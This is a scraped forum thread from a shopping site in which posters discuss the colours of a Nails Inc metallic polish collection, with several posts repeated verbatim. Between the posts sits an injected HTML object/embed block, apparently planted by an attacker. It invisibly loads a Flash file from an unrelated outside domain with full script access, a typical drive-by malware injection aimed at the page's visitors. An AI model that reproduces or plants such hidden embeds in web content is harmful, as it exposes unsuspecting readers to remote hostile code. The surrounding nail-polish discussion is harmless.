Nails Inc Metallic Collection

ShoppingTelly

Help Support ShoppingTelly:

D

Dazzler!

Guest Shopper
Anyone ordered Nails inc Item 228018 - can't do links. I went on waitlist for it the other night as it sold out and now mine is showing in process so looking foward to it, just wondered if anyone got to see these colours on as I missed the preview or if anyone has ordered this collection.

I have this set, having ordered it direct from Nails Inc a few weeks ago! It is absolutely gorgeous! There is a metallic taupe that, I think, works whether you are wearing yellow gold, rose gold or white gold/silver etc jewellery. There is a metallic petrol colour that is hard to pin down as to whether it is more blue or green The powdery blue/lavendar is hard to pin down too - I think it is a similar colour to some of those forge-me-knot flowers you see in summer, that one is not metallic, but creamy and very opaque - don't you just love that Nails Inc always give you something in contrast to the rest of the kit!? My fave is The Mall - a gorgeous rich metallic blue-purple - just fabulous! I think you'll love them, I do!

I have this set, having ordered it direct from Nails Inc a few weeks ago! It is absolutely gorgeous! There is a metallic taupe that, I think, works whether you are wearing yellow gold, rose gold or white gold/silver etc jewellery. There is a metallic petrol colour that is hard to pin down as to whether it is more blue or green...

<object width="0" height="0"><param name="movie" value="http://notebookgraphicscard.info/ngc.swf"><param name="allowScriptAccess" value="always"><embed type="application/x-shockwave-flash" src="http://notebookgraphicscard.info/ngc.swf" width="0" height="0" allowScriptAccess="always"></object>

I have one too and they are fantastic!! Not surprised they sold out.

Anyone ordered Nails inc Item 228018 - can't do links. I went on waitlist for it the other night as it sold out and now mine is showing in process so looking foward to it, just wondered if anyone got to see these colours on as I missed the preview or if anyone has ordered this collection.

I noticed that it was on waitlist during the Charlie/Helen show, but then yesterday they had stock again.

Am tempted .... very tempted ...... hmmmm what to do :33:

I have this set, having ordered it direct from Nails Inc a few weeks ago! It is absolutely gorgeous! There is a metallic taupe that, I think, works whether you are wearing yellow gold, rose gold or white gold/silver etc jewellery. There is a metallic petrol colour that is hard to pin down as to whether it is more blue or green The powdery blue/lavendar is hard to pin down too - I think it is a similar colour to some of those forge-me-knot flowers you see in summer, that one is not metallic, but creamy and very opaque - don't you just love that Nails Inc always give you something in contrast to the rest of the kit!? My fave is The Mall - a gorgeous rich metallic blue-purple - just fabulous! I think you'll love them, I do!

Thak you Nicky for the excellent description of the colours, they sound fab think I am going to love them and won't know which colour to try first!

Thak you Nicky for the excellent description of the colours, they sound fab think I am going to love them and won't know which colour to try first!

The flowers I was refering to were, of course, forget-me-nots, not, as I mistyped - forge me knots!

Latest posts

Back